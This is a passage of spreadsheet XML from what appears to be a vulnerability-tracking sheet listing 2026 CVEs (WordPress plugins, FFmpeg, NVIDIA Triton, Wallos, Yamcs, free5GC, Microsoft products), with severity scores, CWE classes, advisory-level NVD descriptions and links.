          <t>CVE-2026-3174</t>
        </is>
      </c>
      <c r="D1081" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1081" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1081" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1081" s="5" t="inlineStr"/>
      <c r="H1081" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1081" s="5" t="inlineStr"/>
      <c r="J1081" s="5" t="inlineStr"/>
      <c r="K1081" s="5" t="inlineStr"/>
      <c r="L1081" s="5" t="inlineStr"/>
      <c r="M1081" s="5" t="inlineStr"/>
      <c r="N1081" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1081" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1081" s="5" t="inlineStr"/>
      <c r="Q1081" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1081" s="5" t="inlineStr">
        <is>
          <t>The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Stripe OAuth return endpoint in all versions up to, and including, 5.27.4. This makes it possible for unauthenticated attackers to overwrite the site's Stripe merchant credentials (access tokens, publishable keys, and account ID), diverting all subsequent payment processing to the attacker's Stripe account.</t>
        </is>
      </c>
      <c r="S1081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3174</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1082" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38344</t>
        </is>
      </c>
      <c r="D1082" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1082" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1082" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1082" s="5" t="inlineStr"/>
      <c r="H1082" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1082" s="5" t="inlineStr"/>
      <c r="J1082" s="5" t="inlineStr"/>
      <c r="K1082" s="5" t="inlineStr"/>
      <c r="L1082" s="5" t="inlineStr"/>
      <c r="M1082" s="5" t="inlineStr"/>
      <c r="N1082" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1082" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1082" s="5" t="inlineStr"/>
      <c r="Q1082" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R1082" s="5" t="inlineStr">
        <is>
          <t>A NULL pointer dereference in the get_min_buffer_size function (/libswscale/slice.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted video file.</t>
        </is>
      </c>
      <c r="S1082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38344</t>
        </is>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1083" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38347</t>
        </is>
      </c>
      <c r="D1083" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1083" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1083" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1083" s="5" t="inlineStr"/>
      <c r="H1083" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1083" s="5" t="inlineStr"/>
      <c r="J1083" s="5" t="inlineStr"/>
      <c r="K1083" s="5" t="inlineStr"/>
      <c r="L1083" s="5" t="inlineStr"/>
      <c r="M1083" s="5" t="inlineStr"/>
      <c r="N1083" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1083" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1083" s="5" t="inlineStr"/>
      <c r="Q1083" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1083" s="5" t="inlineStr">
        <is>
          <t>A heap overflow in the ff_sws_alphablendaway function (libswscale/alphablend.c) of FFmpeg git-master commit 722a217 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="S1083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38347</t>
        </is>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1084" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47625</t>
        </is>
      </c>
      <c r="D1084" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1084" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1084" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G1084" s="5" t="inlineStr"/>
      <c r="H1084" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1084" s="5" t="inlineStr"/>
      <c r="J1084" s="5" t="inlineStr"/>
      <c r="K1084" s="5" t="inlineStr"/>
      <c r="L1084" s="5" t="inlineStr"/>
      <c r="M1084" s="5" t="inlineStr"/>
      <c r="N1084" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1084" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1084" s="5" t="inlineStr"/>
      <c r="Q1084" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1084" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could abuse missing authorization. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="S1084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47625</t>
        </is>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1085" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48888</t>
        </is>
      </c>
      <c r="D1085" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1085" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1085" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G1085" s="5" t="inlineStr"/>
      <c r="H1085" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1085" s="5" t="inlineStr"/>
      <c r="J1085" s="5" t="inlineStr"/>
      <c r="K1085" s="5" t="inlineStr"/>
      <c r="L1085" s="5" t="inlineStr"/>
      <c r="M1085" s="5" t="inlineStr"/>
      <c r="N1085" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1085" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1085" s="5" t="inlineStr"/>
      <c r="Q1085" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R1085" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in Automattic WooCommerce allows HTTP DoS.
This issue affects WooCommerce: from n/a before 11.1.0.</t>
        </is>
      </c>
      <c r="S1085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48888</t>
        </is>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1086" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1086" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52770</t>
        </is>
      </c>
      <c r="D1086" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1086" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1086" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1086" s="5" t="inlineStr"/>
      <c r="H1086" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1086" s="5" t="inlineStr"/>
      <c r="J1086" s="5" t="inlineStr"/>
      <c r="K1086" s="5" t="inlineStr"/>
      <c r="L1086" s="5" t="inlineStr"/>
      <c r="M1086" s="5" t="inlineStr"/>
      <c r="N1086" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1086" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1086" s="5" t="inlineStr"/>
      <c r="Q1086" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1086" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki’s public Bazar entry-listing APIs are vulnerable to unauthenticated SQL injection in numeric query / queries filters. For Bazar fields whose value structure is numeric, YesWiki escapes the attacker-controlled filter value but inserts it into SQL without quotes or numeric validation. An unauthenticated attacker can inject boolean SQL expressions and infer database contents from whether entries are returned. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S1086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52770</t>
        </is>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1087" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1087" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54598</t>
        </is>
      </c>
      <c r="D1087" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1087" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1087" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1087" s="5" t="inlineStr"/>
      <c r="H1087" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1087" s="5" t="inlineStr"/>
      <c r="J1087" s="5" t="inlineStr"/>
      <c r="K1087" s="5" t="inlineStr"/>
      <c r="L1087" s="5" t="inlineStr"/>
      <c r="M1087" s="5" t="inlineStr"/>
      <c r="N1087" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1087" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1087" s="5" t="inlineStr"/>
      <c r="Q1087" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1087" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.4, endpoints/db/migrate.php executes database schema migrations when called over HTTP with zero authentication. Any unauthenticated attacker can trigger pending migration files against the live SQLite database. This issue has been patched in version 4.9.4.</t>
        </is>
      </c>
      <c r="S1087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54598</t>
        </is>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1088" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54599</t>
        </is>
      </c>
      <c r="D1088" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1088" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1088" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1088" s="5" t="inlineStr"/>
      <c r="H1088" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1088" s="5" t="inlineStr"/>
      <c r="J1088" s="5" t="inlineStr"/>
      <c r="K1088" s="5" t="inlineStr"/>
      <c r="L1088" s="5" t="inlineStr"/>
      <c r="M1088" s="5" t="inlineStr"/>
      <c r="N1088" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1088" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1088" s="5" t="inlineStr"/>
      <c r="Q1088" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R1088" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.4, login.php generates an OIDC state nonce stored in $_SESSION['oidc_state'], but checksession.php dispatches the OIDC callback without comparing the incoming state against the session value. An attacker can trick a victim into visiting a crafted URL, causing Wallos to exchange the attacker's authorization code and log the victim into the attacker's account. This issue has been patched in version 4.9.4.</t>
        </is>
      </c>
      <c r="S1088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54599</t>
        </is>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1089" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55215</t>
        </is>
      </c>
      <c r="D1089" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1089" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1089" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1089" s="5" t="inlineStr"/>
      <c r="H1089" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1089" s="5" t="inlineStr"/>
      <c r="J1089" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K1089" s="5" t="inlineStr"/>
      <c r="L1089" s="5" t="inlineStr"/>
      <c r="M1089" s="5" t="inlineStr"/>
      <c r="N1089" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1089" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1089" s="5" t="inlineStr"/>
      <c r="Q1089" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-522</t>
        </is>
      </c>
      <c r="R1089"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S1089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55215</t>
        </is>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1090" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55552</t>
        </is>
      </c>
      <c r="D1090" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1090" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1090" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1090" s="5" t="inlineStr"/>
      <c r="H1090" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1090" s="5" t="inlineStr"/>
      <c r="J1090" s="5" t="inlineStr"/>
      <c r="K1090" s="5" t="inlineStr"/>
      <c r="L1090" s="5" t="inlineStr"/>
      <c r="M1090" s="5" t="inlineStr"/>
      <c r="N1090" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1090" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1090" s="5" t="inlineStr"/>
      <c r="Q1090" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1090" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.11.13, Yamcs StaticFileHandler.locateFile resolves an unauthenticated request path without using Path.normalize and Path.toAbsolutePath to confirm that the absolute path remains within the configured staticRoots. A path containing traversal segments can escape the intended web root and return an arbitrary readable host file. The flaw is in yamcs-core/src/main/java/org/yamcs/http/StaticFileHandler.java and can disclose sensitive operating-system and application data. This issue is fixed in version 5.11.13, and the 5.12 line is fixed from version 5.12.0.</t>
        </is>
      </c>
      <c r="S1090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55552</t>
        </is>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1091" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55784</t>
        </is>
      </c>
      <c r="D1091" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1091" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1091" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1091" s="5" t="inlineStr"/>
      <c r="H1091" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1091" s="5" t="inlineStr"/>
      <c r="J1091" s="5" t="inlineStr"/>
      <c r="K1091" s="5" t="inlineStr"/>
      <c r="L1091" s="5" t="inlineStr"/>
      <c r="M1091" s="5" t="inlineStr"/>
      <c r="N1091" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1091" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1091" s="5" t="inlineStr"/>
      <c r="Q1091" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1091" s="5" t="inlineStr">
        <is>
          <t>free5GC is an open-source implementation of the 5G core network. In version 1.4.4 and earlier, the AUSF component stores per-subscriber authentication state in a global sync.Map named AUSFContext.UePool in internal/context/context.go, keyed only by SUPI. Every request handled by internal/sbi/processor/ue_authentication.go creates an AusfUeContext, and AddAusfUeContextToPool executes ausfContext.UePool.Store(ausfUeContext.Supi, ausfUeContext), unconditionally replacing the active context for that SUPI. An attacker with access to the AUSF SBI/N12 interface can send concurrent POST /nausf-auth/v1/ue-authentications requests for the same target SUPI, causing all attempts to share one logical authentication context URL while K_aut, XRES, and EapID are repeatedly overwritten. A valid EAP-AKA' response for an earlier challenge is then checked against the latest context, causing AT_MAC verification to fail and denying authentication to the selected subscriber while the request flood continues. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="S1091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55784</t>
        </is>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1092" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57098</t>
        </is>
      </c>
      <c r="D1092" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1092" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1092" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1092" s="5" t="inlineStr"/>
      <c r="H1092" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1092" s="5" t="inlineStr"/>
      <c r="J1092" s="5" t="inlineStr"/>
      <c r="K1092" s="5" t="inlineStr">
        <is>
          <t>microsoft:remote_desktop_client</t>
        </is>
      </c>
      <c r="L1092" s="5" t="inlineStr"/>
      <c r="M1092" s="5" t="inlineStr"/>
      <c r="N1092" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1092" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1092" s="5" t="inlineStr"/>
      <c r="Q1092" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R1092" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t>
        </is>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1093" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57099</t>
        </is>
      </c>
      <c r="D1093" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1093" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1093" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1093" s="5" t="inlineStr"/>
      <c r="H1093" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1093" s="5" t="inlineStr"/>
      <c r="J1093" s="5" t="inlineStr"/>
      <c r="K1093" s="5" t="inlineStr"/>
      <c r="L1093" s="5" t="inlineStr"/>
      <c r="M1093" s="5" t="inlineStr"/>
      <c r="N1093" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1093" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1093" s="5" t="inlineStr"/>
      <c r="Q1093" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R1093" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t>
        </is>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1094" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62759</t>
        </is>
      </c>
      <c r="D1094" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1094" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1094" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1094" s="5" t="inlineStr"/>
      <c r="H1094" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1094" s="5" t="inlineStr"/>
      <c r="J1094" s="5" t="inlineStr"/>
      <c r="K1094" s="5" t="inlineStr"/>
      <c r="L1094" s="5" t="inlineStr"/>
      <c r="M1094" s="5" t="inlineStr"/>
      <c r="N1094" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1094" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1094" s="5" t="inlineStr"/>
      <c r="Q1094" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R1094" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="S1094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t>
        </is>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1095" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62813</t>
        </is>
      </c>
      <c r="D1095" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1095" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1095" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1095" s="5" t="inlineStr"/>
      <c r="H1095" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1095" s="5" t="inlineStr"/>
      <c r="J1095" s="5" t="inlineStr"/>
      <c r="K1095" s="5" t="inlineStr"/>
      <c r="L1095" s="5" t="inlineStr"/>
      <c r="M1095" s="5" t="inlineStr"/>
      <c r="N1095" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1095" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1095" s="5" t="inlineStr"/>
      <c r="Q1095" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1095" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t>
        </is>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1096" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66304</t>
        </is>
      </c>
      <c r="D1096" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1096" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1096" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1096" s="5" t="inlineStr"/>
      <c r="H1096" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1096" s="5" t="inlineStr"/>
      <c r="J1096" s="5" t="inlineStr"/>
      <c r="K1096" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L1096" s="5" t="inlineStr"/>
      <c r="M1096" s="5" t="inlineStr"/>
      <c r="N1096" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1096" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1096" s="5" t="inlineStr"/>
      <c r="Q1096" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1096" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t>
        </is>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1097" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66307</t>
        </is>
      </c>
      <c r="D1097" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1097" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1097" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1097" s="5" t="inlineStr"/>
      <c r="H1097" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1097" s="5" t="inlineStr"/>
      <c r="J1097" s="5" t="inlineStr"/>
      <c r="K1097" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L1097" s="5" t="inlineStr"/>
      <c r="M1097" s="5" t="inlineStr"/>
      <c r="N1097" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1097" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1097" s="5" t="inlineStr"/>
      <c r="Q1097" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R1097" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t>
        </is>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="5" t="inlineStr">
